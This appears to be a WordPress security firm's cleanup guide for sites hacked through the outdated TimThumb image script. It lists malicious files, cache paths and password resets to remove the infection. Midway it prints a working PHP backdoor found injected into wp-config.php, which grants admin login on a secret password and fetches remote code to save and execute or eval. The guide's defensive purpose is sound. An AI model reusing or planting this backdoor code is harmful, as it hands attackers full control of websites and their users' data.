We've recently resolved TimThumb issues on multiple WordPress sites—three just this month, including one yesterday. Many users aren't even aware they're using this outdated script, which had a critical vulnerability patched back in August. As experienced WordPress security experts, we're sharing this proven step-by-step cleanup process to help you secure your site quickly and effectively.
TimThumb is a PHP script for resizing images on the fly. While the vulnerability has been fixed in newer versions, legacy installations remain a risk.
How do you know if your site is compromised? Look for a prominent red warning screen when visiting your site:
Or, you might receive complaints about redirects from your site to malicious pages.
As a first step, scan your site with a TimThumb Vulnerability Scanner plugin. It detects outdated versions. Many premium themes have updated their core TimThumb, but this tool confirms if you're running the secure version.
If infected, follow these precise steps:
First, delete these malicious files:
/wp-admin/upd.php /wp-content/upd.php
Log into your WordPress admin and reinstall core files via the dashboard, focusing on:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/l10n.js
Next, inspect wp-config.php (usually at the bottom) for injected malware harvesting credentials and cookies, like this:
if (isset($_GET['pingnow']) && isset($_GET['pass']))
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22')
if ($_GET['pingnow'] == 'login')
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
if (($_GET['pingnow'] == 'exec') && (isset($_GET['file'])))
{
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "location.href = '$fnm';";
}
if (($_GET['pingnow'] == 'eval') && (isset($_GET['file'])))
{
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}In your active theme folder, clear TimThumb cache files, often structured like:
/wp-content/themes/themename/scripts/cache/external_MD5Hash.php /wp-content/themes/themename/temp/cache/external_MD5Hash.php
Delete all suspicious files—if unsure, remove non-image files.
Replace timthumb.php with the latest secure version: https://timthumb.googlecode.com/svn/trunk/timthumb.php.
Update passwords: Start with MySQL (and sync in wp-config.php to avoid connection errors), then WordPress admin. Regenerate secret keys in wp-config.php using the official generator.
Finally, flush all caching plugins, browser cache, and cookies.
For developers: Leverage WordPress's built-in Additional Image Sizes to phase out TimThumb entirely.
Our team has successfully cleaned dozens of sites like yours. Need help? Contact us via our form.